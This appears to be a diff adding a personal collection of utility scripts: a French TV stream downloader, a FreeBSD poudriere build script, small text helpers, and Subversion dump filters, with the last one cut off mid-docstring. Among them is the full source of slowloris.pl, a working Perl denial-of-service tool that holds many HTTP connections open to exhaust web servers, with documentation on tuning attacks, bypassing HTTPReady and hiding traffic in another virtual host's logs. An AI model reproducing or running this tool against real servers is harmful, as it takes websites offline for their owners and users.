@@ -0,0 +1,58 @@
#!/bin/bash
# Script for using pluzz.fr
# v0.2 (11 July 2010)
if [ $# != 2 ]
then
printf "Syntaxe: $0 [url|play|record] http://www.pluzz.fr/...\n" >&2
exit 1
fi
command="$1"
url="$2"
if [ "$command" != 'url' -a "$command" != 'play' -a "$command" != 'record' ]
then
printf "Command must be 'url', 'play' or 'record', not '$command'\n" >&2
exit 2
fi
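# Example (illustrative): ./pluzz play http://www.pluzz.fr/...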
video_page_url=$(wget -qO- "$url" | grep -o 'http://info.francetelevisions.fr/?id-video=[^"]\+')
stream_url_part2=$(wget -qO- "$video_page_url" | grep urls-url-video | sed 's/.*content="\(.*\)".*/\1/')
ext=${stream_url_part2##*.}
if [ "$ext" = 'wmv' ]
then
stream_url_part1='mms://a988.v101995.c10199.e.vm.akamaistream.net/7/988/10199/3f97c7e6/ftvigrp.download.akamai.com/10199/cappuccino/production/publication'
elif [ "$ext" = 'mp4' ]
then
stream_url_part1='rtmp://videozones-rtmp.francetv.fr/ondemand/mp4:cappuccino/publication'
else
printf "Extension not managed : '$ext'\n" >&2
exit 3
fi
stream_url="$stream_url_part1/$stream_url_part2"
if [ "$command" = "url" ]
then
printf "$stream_url\n"
elif [ "$command" = "play" ]
then
if [ "$ext" = 'wmv' ]
then
vlc "$stream_url"
else
flvstreamer -r "$stream_url" | vlc -
fi
elif [ "$command" = "record" ]
then
output_file=${stream_url##*/}
printf "Recording to $output_file...\n"
if [ "$ext" = 'wmv' ]
then
#vlc "$stream_url" ":sout=#std{access=file,mux=asf,dst=$output_file}"
mplayer $stream_url -dumpstream -dumpfile $output_file
else
flvstreamer -r "$stream_url" -o "$output_file"
fi
fi

poudriere_bulk.sh Executable file

@@ -0,0 +1,5 @@
#!/bin/sh
# poudriere update ports, rebuild 9.2
/usr/local/bin/poudriere ports -u
/usr/local/bin/poudriere bulk -f /root/build.list -j 92amd64 &

remove_bom Executable file

@@ -0,0 +1,3 @@
#!/bin/bash
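# strips a UTF-8 byte-order mark (EF BB BF) from the first line of the given
# file and prints the result to stdout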
awk '{if(NR==1)sub(/^\xef\xbb\xbf/,"");print}' $1

rword.sh Executable file

@@ -0,0 +1,14 @@
#!/usr/bin/env bash
WORDFILE="/usr/share/dict/words"
NUMWORDS=${1:-5}
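# Example (illustrative): ./rword.sh 3   # prints 3 random dictionary words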
#Number of lines in $WORDFILE
tL=`awk 'NF!=0 {++c} END {print c}' $WORDFILE`
for i in `seq $NUMWORDS`
do
# pick a 1-based line number (sed line addresses start at 1)
rnum=$(( ($RANDOM * $RANDOM) % tL + 1 ))
sed -n "$rnum p" $WORDFILE
done

slowloris.pl Executable file

@@ -0,0 +1,463 @@
#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
print <<EOTEXT;
CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c. . .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888\@8\@88888888Oo:. . ...cO888Oc.. :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888\@88888888888Oo:. .O8888C: .oCOo. ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8\@88OO8O888Oo:::... .. :cO8Oc. . ..... :. .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::.. .... ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:... ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
..... ............. .coocoooCCoco:::ccccccc:::ccc::.......... ....:::cc::::coC
. . ... .... .. .:cccoCooc:.. ::cccc:::c:.. ......... ......::::c:cccco
. .. ... .. .. .. ..:...:cooc::cccccc:..... ......... .....:::::ccoocc
. . .. ..::cccc:.::ccoocc:. ........... .. . ..:::.:::::::ccco
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
EOTEXT
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
'shost=s' => \$shost,
'dns=s' => \$host,
'httpready' => \$httpready,
'num=i' => \$connections,
'cache' => \$cache,
'port=i' => \$port,
'https' => \$ssl,
'tcpto=i' => \$tcpto,
'test' => \$test,
'timeout=i' => \$timeout,
'version' => \$version,
);
if ($version) {
print "Version 0.7\n";
exit;
}
unless ($host) {
print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
print "\n\tType 'perldoc $0' for help with options.\n\n";
exit;
}
unless ($port) {
$port = 80;
print "Defaulting to port 80.\n";
}
unless ($tcpto) {
$tcpto = 5;
print "Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
unless ($timeout) {
$timeout = 100;
print "Defaulting to a 100 second re-try timeout.\n";
}
unless ($connections) {
$connections = 1000;
print "Defaulting to 1000 connections.\n";
}
}
my $usemultithreading = 0;
if ( $Config{usethreads} ) {
print "Multithreading enabled.\n";
$usemultithreading = 1;
use threads;
use threads::shared;
}
else {
print "No multithreading capabilites found!\n";
print "Slowloris will be slower than normal as a result.\n";
}
my $packetcount : shared = 0;
my $failed : shared = 0;
my $connectioncount : shared = 0;
srand() if ($cache);
if ($shost) {
$sendhost = $shost;
}
else {
$sendhost = $host;
}
if ($httpready) {
$method = "POST";
}
else {
$method = "GET";
}
if ($test) {
my @times = ( "2", "30", "90", "240", "500" );
my $totaltime = 0;
foreach (@times) {
$totaltime = $totaltime + $_;
}
$totaltime = $totaltime / 60;
print "This test could take up to $totaltime minutes.\n";
my $delay = 0;
my $working = 0;
my $sock;
if ($ssl) {
if (
$sock = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
else {
if (
$sock = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
if ($working) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"GET /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
if ( print $sock $primarypayload ) {
print "Connection successful, now comes the waiting game...\n";
}
else {
print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
}
else {
print "Uhm... I can't connect to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
for ( my $i = 0 ; $i <= $#times ; $i++ ) {
print "Trying a $times[$i] second delay: \n";
sleep( $times[$i] );
if ( print $sock "X-a: b\r\n" ) {
print "\tWorked.\n";
$delay = $times[$i];
}
else {
if ( $SIG{__WARN__} ) {
$delay = $times[ $i - 1 ];
last;
}
print "\tFailed after $times[$i] seconds.\n";
}
}
if ( print $sock "Connection: Close\r\n\r\n" ) {
print "Okay that's enough time. Slowloris closed the socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
else {
print "Remote server closed socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
if ( $delay < 166 ) {
print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all... you might have trouble using Slowloris against this target. You can
tweak the -timeout flag down to less than 10 seconds but it still may not
build the sockets in time.
EOSUCKS2BU
}
}
else {
print
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
if ($usemultithreading) {
domultithreading($connections);
}
else {
doconnections( $connections, $usemultithreading );
}
}
sub doconnections {
my ( $num, $usemultithreading ) = @_;
my ( @first, @sock, @working );
my $failedconnections = 0;
$working[$_] = 0 foreach ( 1 .. $num ); #initializing
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
while (1) {
$failedconnections = 0;
print "\t\tBuilding sockets.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 0 ) {
if ($ssl) {
if (
$sock[$z] = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
}
else {
$working[$z] = 0;
}
}
else {
if (
$sock[$z] = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
$packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
}
else {
$working[$z] = 0;
}
}
if ( $working[$z] == 1 ) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"$method /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if ($handle) {
print $handle "$primarypayload";
if ( $SIG{__WARN__} ) {
$working[$z] = 0;
close $handle;
$failed++;
$failedconnections++;
}
else {
$packetcount++;
$working[$z] = 1;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
}
print "\t\tSending data.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 1 ) {
if ( $sock[$z] ) {
my $handle = $sock[$z];
if ( print $handle "X-a: b\r\n" ) {
$working[$z] = 1;
$packetcount++;
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
}
print
"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
sleep($timeout);
}
}
sub domultithreading {
my ($num) = @_;
my @thrs;
my $i = 0;
my $connectionsperthread = 50;
while ( $i < $num ) {
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1 );
$i += $connectionsperthread;
}
my @threadslist = threads->list();
while ( $#threadslist > 0 ) {
$failed = 0;
}
}
__END__
=head1 TITLE
Slowloris
=head1 VERSION
Version 0.7 Beta
=head1 DATE
06/17/2009
=head1 AUTHOR
RSnake <h@ckers.org> with threading from John Kinsella
=head1 ABSTRACT
Slowloris both helps identify the timeout windows of an HTTP server or proxy server, can bypass httpready protection, and ultimately performs a fairly low-bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
=head1 AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?
=head1 NOT AFFECTED
IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?
=head1 DESCRIPTION
Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of its threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well.
As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood.
=head2 Testing
If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
=head3 Testing Example:
./slowloris.pl -dns www.example.com -port 80 -test
This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).
=head2 HTTP DoS
Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the connection is fairly latent, you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though.
=head3 HTTP DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
=head2 HTTPReady Bypass
HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch.
=head3 HTTPReady Bypass Example
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
=head2 Stealth Host DoS
If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a separate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.
=head3 Stealth Host DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com
=head2 HTTPS DoS
Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary.
=head3 HTTPS DoS Example:
./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
=head2 HTTP Cache
Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary.
=head3 HTTP Cache Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
=head1 Issues
Slowloris is known not to work on several servers found in the NOT AFFECTED section above and through NetScaler devices, in its current incarnation. There may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distributed, although only NetScaler has been tested.
Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far, far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher-traffic sites it is unlikely to be noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture.
For some reason Slowloris works way better if run from a *nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open more than ~130 or so sockets against any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD.
Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to its logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.
=head1 What is a slow loris?
What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out:
http://www.youtube.com/watch?v=rLdQ3UhLoD4

svndumpfilter2 Executable file

@@ -0,0 +1,439 @@
#!/usr/bin/env python
# Utility to filter a dump file of a Subversion repository to
# produce a dump file describing only specified subdirectories of
# the tree contained in the original one. This is similar in
# concept to the official tool `svndumpfilter', but it's able to
# cope with revisions which copy files into the area of interest
# from outside it (in which situation a Node-copyfrom won't be
# valid in the output dump file). However, in order to support
# this, svndumpfilter2 requires access via `svnlook' to the
# original repository from which the input dump file was produced.
#
# Usage:
#
# svndumpfilter2 [options] source-repository regexp [regexp...]
#
# This command expects to receive a Subversion dump file on
# standard input, which must correspond to the Subversion
# repository pointed to by the first argument. It outputs a
# filtered dump file on standard output.
#
# `source-repository': The first argument must be a pathname to a
# _local_ Subversion repository. That is, it isn't a Subversion URL
# (beginning with http:// or svn:// or anything else like that);
# it's a simple local pathname (absolute or relative). A simple
# test to see if it's a valid pathname is to pass it as an argument
# to `svnlook tree'. If that succeeds, it's also a valid first
# argument to svndumpfilter2.
#
# `regexp': The remaining arguments are used to select directory
# names from the top level of the repository's internal directory
# tree. Any directory matching any of the regexps will be
# considered `interesting' and copied into the output dump file;
# any directory not matching will not. Matching is performed at the
# top level only: it is not currently possible to selectively
# include a subset of second-level directories with a common
# parent.
#
# Options include:
#
# `--drop-empty-revs': Exclude empty revisions from the output.
#
# `--renumber-revs': Generate sequential revision numbers in the
# filtered output. This may help work around issues with certain
# versions of 'svnadmin load'.
#
# For example, this command...
#
# svndumpfilter2 /home/svnadmin/myrepos foo bar baz quu+x
#
# ... will read a dump file on standard input, and output one on
# standard output which contains only the subdirectories `foo',
# `bar', `baz', `quux', `quuux', `quuuux', etc.
#
# You will probably usually want to use svndumpfilter2 in
# conjunction with the production of the dump file in the first
# place, like this:
#
# svnadmin dump /home/svnadmin/myrepos | \
# svndumpfilter2 /home/svnadmin/myrepos foo bar baz quu+x > msv.dump
import sys
import os
import re
import string
import types
import md5
from optparse import OptionParser
# Quoting function which should render any string impervious to
# POSIX shell metacharacter expansion.
def quote(word):
return "'" + string.replace(word, "'", "'\\''") + "'"
# First, the sensible way to deal with a pathname is to split it
# into pieces at the slashes and thereafter treat it as a list.
def splitpath(s):
list = string.split(s, "/")
# Simplest way to remove all empty elements!
try:
while 1:
list.remove("")
except ValueError:
pass
return list
def joinpath(list, prefix=""):
return prefix + string.join(list, "/")
def cleanpath(s):
return joinpath(splitpath(s))
def catpath(path1, path2, prefix=""):
return joinpath(splitpath(path1) + splitpath(path2), prefix)
# Decide whether a pathname is interesting or not.
class InterestingPaths:
def __init__(self, args):
self.res = []
for a in args:
self.res.append(re.compile(a))
def interesting(self, path):
path = cleanpath(path)
if path == '':
# It's possible that the path may have no elements at
# all, in which case we can't match on its first
# element. This generally occurs when svn properties
# are being changed on the root of the repository; we
# consider those to be always interesting and never
# filter them out.
return 1
for r in self.res:
if r.match(path):
return 1
return 0
# A class and some functions to handle a single lump of
# RFC822-ish-headers-plus-data read from an SVN dump file.
class Lump:
def __init__(self):
self.hdrlist = []
self.hdrdict = {}
self.prop = ""
self.text = None
self.extant = 1
self.props = [[], {}]
def sethdr(self, key, val):
if not self.hdrdict.has_key(key):
self.hdrlist.append(key)
self.hdrdict[key] = val
def delhdr(self, key):
if self.hdrdict.has_key(key):
del self.hdrdict[key]
self.hdrlist.remove(key)
def propparse(self):
index = 0
while 1:
if self.prop[index:index+2] == "K ":
wantval = 1
elif self.prop[index:index+2] == "D ":
wantval = 0
elif self.prop[index:index+9] == "PROPS-END":
break
else:
raise "Unrecognised record in props section"
nlpos = string.find(self.prop, "\n", index)
assert nlpos > 0
namelen = string.atoi(self.prop[index+2:nlpos])
assert self.prop[nlpos+1+namelen] == "\n"
name = self.prop[nlpos+1:nlpos+1+namelen]
index = nlpos+2+namelen
if wantval:
assert self.prop[index:index+2] == "V "
nlpos = string.find(self.prop, "\n", index)
assert nlpos > 0
proplen = string.atoi(self.prop[index+2:nlpos])
assert self.prop[nlpos+1+proplen] == "\n"
prop = self.prop[nlpos+1:nlpos+1+proplen]
index = nlpos+2+proplen
else:
prop = None
self.props[0].append(name)
self.props[1][name] = prop
def setprop(self, key, val):
if not self.props[1].has_key(key):
self.props[0].append(key)
self.props[1][key] = val
def delprop(self, key):
if self.props[1].has_key(key):
del self.props[1][key]
self.props[0].remove(key)
def correct_headers(self, revmap):
# First reconstitute the properties block.
self.prop = ""
if (not (self.props is None)) and len(self.props[0]) > 0:
for key in self.props[0]:
val = self.props[1][key]
if val == None:
self.prop = self.prop + "D %d" % len(key) + "\n" + key + "\n"
else:
self.prop = self.prop + "K %d" % len(key) + "\n" + key + "\n"
self.prop = self.prop + "V %d" % len(val) + "\n" + val + "\n"
self.prop = self.prop + "PROPS-END\n"
# Now fix up the content length headers.
if len(self.prop) > 0:
self.sethdr("Prop-content-length", str(len(self.prop)))
else:
self.delhdr("Prop-content-length")
# Only fiddle with the md5 if we're not doing a delta.
if self.hdrdict.get("Text-delta", "false") != "true":
if self.text != None:
self.sethdr("Text-content-length", str(len(self.text)))
m = md5.new()
m.update(self.text)
self.sethdr("Text-content-md5", m.hexdigest())
else:
self.delhdr("Text-content-length")
self.delhdr("Text-content-md5")
if len(self.prop) > 0 or self.text != None:
if self.text == None:
textlen = 0
else:
textlen = len(self.text)
self.sethdr("Content-length", str(len(self.prop)+textlen))
else:
self.delhdr("Content-length")
# Adjust the revision numbers as needed.
for header in ["Revision-number", "Node-copyfrom-rev"]:
if self.hdrdict.has_key(header):
old_val = int(self.hdrdict[header])
if revmap != None:
new_val = revmap[old_val]
else:
new_val = old_val
self.sethdr(header, str(new_val))
def read_rfc822_headers(f):
ret = Lump()
while 1:
s = f.readline()
if s == "":
return None # end of file
if s == "\n":
if len(ret.hdrlist) > 0:
break # newline after headers ends them
else:
continue # newline before headers is simply ignored
if s[-1:] == "\n": s = s[:-1]
colon = string.find(s, ":")
assert colon > 0
assert s[colon:colon+2] == ": "
key = s[:colon]
val = s[colon+2:]
ret.sethdr(key, val)
return ret
def read_lump(f):
lump = read_rfc822_headers(f)
if lump == None:
return None
pcl = string.atoi(lump.hdrdict.get("Prop-content-length", "0"))
if pcl > 0:
lump.prop = f.read(pcl)
lump.propparse()
if lump.hdrdict.has_key("Text-content-length"):
tcl = string.atoi(lump.hdrdict["Text-content-length"])
lump.text = f.read(tcl)
return lump
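# A typical node lump as consumed by read_lump(), for reference (a sketch
# with made-up values):
#   Node-path: trunk/foo.c
#   Node-kind: file
#   Node-action: change
#   Prop-content-length: 10
#   Text-content-length: 12
#   Content-length: 22
# followed by a blank line, then exactly 10 bytes of props and 12 bytes
# of text.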
def write_lump(f, lump, revmap):
if not lump.extant:
return
lump.correct_headers(revmap)
for key in lump.hdrlist:
val = lump.hdrdict[key]
f.write(key + ": " + val + "\n")
f.write("\n")
f.write(lump.prop)
if lump.text != None:
f.write(lump.text)
if lump.hdrdict.has_key("Prop-content-length") or \
lump.hdrdict.has_key("Text-content-length") or \
lump.hdrdict.has_key("Content-length"):
f.write("\n")
# Higher-level class that makes use of the above to filter dump
# file fragments a whole revision at a time.
class Filter:
def __init__(self, paths):
self.revisions = {}
self.paths = paths
def tweak(self, revhdr, contents):
contents2 = []
for lump in contents:
action = lump.hdrdict["Node-action"]
path = lump.hdrdict["Node-path"]
if not self.paths.interesting(path):
continue # boooring
need = 1 # we need to do something about this lump
if action == "add":
if lump.hdrdict.has_key("Node-copyfrom-path"):
srcrev = string.atoi(lump.hdrdict["Node-copyfrom-rev"])
srcpath = lump.hdrdict["Node-copyfrom-path"]
if not self.paths.interesting(srcpath):
# Copy from a boring path to an interesting
# one, meaning we must use svnlook to
# extract the subtree and convert it into
# lumps.
treecmd = "svnlook tree -r%d %s %s" % \
(srcrev, quote(repos), quote(srcpath))
tree = os.popen(treecmd, "r")
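# The svnlook tree output parsed below looks like (a sketch):
#   subproj/
#    README
#    doc/
#     notes.txt
# one leading space per nesting level, with a trailing '/' on
# directories; the loop rebuilds full paths from that indentation.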
pathcomponents = []
while 1:
treeline = tree.readline()
if treeline == "": break
if treeline[-1:] == "\n": treeline = treeline[:-1]
subdir = 0
while treeline[-1:] == "/":
subdir = 1
treeline = treeline[:-1]
depth = 0
while treeline[:1] == " ":
depth = depth + 1
treeline = treeline[1:]
pathcomponents[depth:] = [treeline]
thissrcpath = string.join([srcpath] + pathcomponents[1:], "/")
thisdstpath = string.join([path] + pathcomponents[1:], "/")
newlump = Lump()
newlump.sethdr("Node-path", thisdstpath)
newlump.sethdr("Node-action", "add")
props = os.popen("svnlook pl -r%d %s %s" % \
(srcrev, quote(repos), quote(thissrcpath)), "r")
while 1:
propname = props.readline()
if propname == "": break
if propname[-1:] == "\n": propname = propname[:-1]
while propname[:1] == " ": propname = propname[1:]
propf = os.popen("svnlook pg -r%d %s %s %s" % \
(srcrev, quote(repos), quote(propname), quote(thissrcpath)), "r")
proptext = propf.read()
propf.close()
newlump.setprop(propname, proptext)
props.close()
if subdir:
newlump.sethdr("Node-kind", "dir")
else:
newlump.sethdr("Node-kind", "file")
f = os.popen("svnlook cat -r%d %s %s" % \
(srcrev, quote(repos), quote(thissrcpath)), "r")
newlump.text = f.read()
f.close()
contents2.append(newlump)
tree.close()
if lump.text != None:
# This was a copyfrom _plus_ some sort of
# delta or new contents, which means that
# having done the copy we now also need a
# change record providing the new contents.
lump.sethdr("Node-action", "change")
lump.delhdr("Node-copyfrom-rev")
lump.delhdr("Node-copyfrom-path")
else:
need = 0 # we have now done something
if need:
contents2.append(lump)
# Change the contents array.
contents[:] = contents2
# If we've just removed everything in this revision, leave
# out some revision properties as well.
if (len(contents) == 0):
revhdr.delprop("svn:log")
revhdr.delprop("svn:author")
revhdr.delprop("svn:date")
fr = sys.stdin
fw = sys.stdout
# Parse our command-line arguments.
parser = OptionParser(usage="Usage: %prog [options] src-repo regexp...")
parser.add_option("--drop-empty-revs", action="store_true",
dest="drop_empty_revs", default=False,
help="filter empty revisions from the dump")
parser.add_option("--renumber-revs", action="store_true",
dest="renumber_revs", default=False,
help="renumber remaining revisions")
(options, args) = parser.parse_args()
if len(args) < 2:
print >>sys.stderr, sys.argv[0] + ": Too few arguments."
print >>sys.stderr, parser.usage
sys.exit(2)
repos = args[0]
paths = InterestingPaths(args[1:])
# We use this table to map input revisions to output revisions.
if options.renumber_revs:
revmap = {}
else:
revmap = None
# Pass the dump-file header through unchanged.
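# (The header lines are themselves parsed as lumps, e.g., a sketch:
#    SVN-fs-dump-format-version: 2
#    UUID: <repository uuid>
#  neither has a Revision-number header, so both pass through here.)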
lump = read_lump(fr)
while not lump.hdrdict.has_key("Revision-number"):
write_lump(fw, lump, revmap)
lump = read_lump(fr)
revhdr = lump
filt = Filter(paths)
current_output_rev = 0
while revhdr != None:
# Read revision header.
assert revhdr.hdrdict.has_key("Revision-number")
contents = []
# Read revision contents.
while 1:
lump = read_lump(fr)
if lump == None or lump.hdrdict.has_key("Revision-number"):
newrevhdr = lump
break
contents.append(lump)
# Alter the contents of the revision.
filt.tweak(revhdr, contents)
# Determine whether we should output this revision. We only
# update the current_output_rev if we're actually going to write
# something.
should_write = (len(contents) > 0 or not options.drop_empty_revs)
if should_write:
current_output_rev += 1
# Update our revmap with information about this revision. Note that
# if this revision won't be written, current_output_rev still points
# to the last version we dumped.
input_rev = int(revhdr.hdrdict["Revision-number"])
if revmap != None:
revmap[input_rev] = current_output_rev
# Write out this revision, if that's what we've decided to do.
if should_write:
write_lump(fw, revhdr, revmap)
for lump in contents:
write_lump(fw, lump, revmap)
# And loop round again.
revhdr = newrevhdr
fr.close()
fw.close()

906
svndumpfilter3 Executable file
View File

@ -0,0 +1,906 @@
#!/usr/bin/env python
#encoding:UTF-8
#
# Copyright (C) 2006 Martin Blais <blais at furius dot ca>
# 2008-02: Improvements by "Giovanni Bajo" <rasky at develer dot com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""svndumpfilter3 [<options>] [<path> ...]
A rewrite of Subversion's svndumpfilter in pure Python, that allows you to
untangle move/copy operations between excluded and included sets of files/dirs,
by converting them into additions. If you use this option, it fetches the
original files from a given repository.
.. important::
Some people have been reporting a bug with this script, that it will create
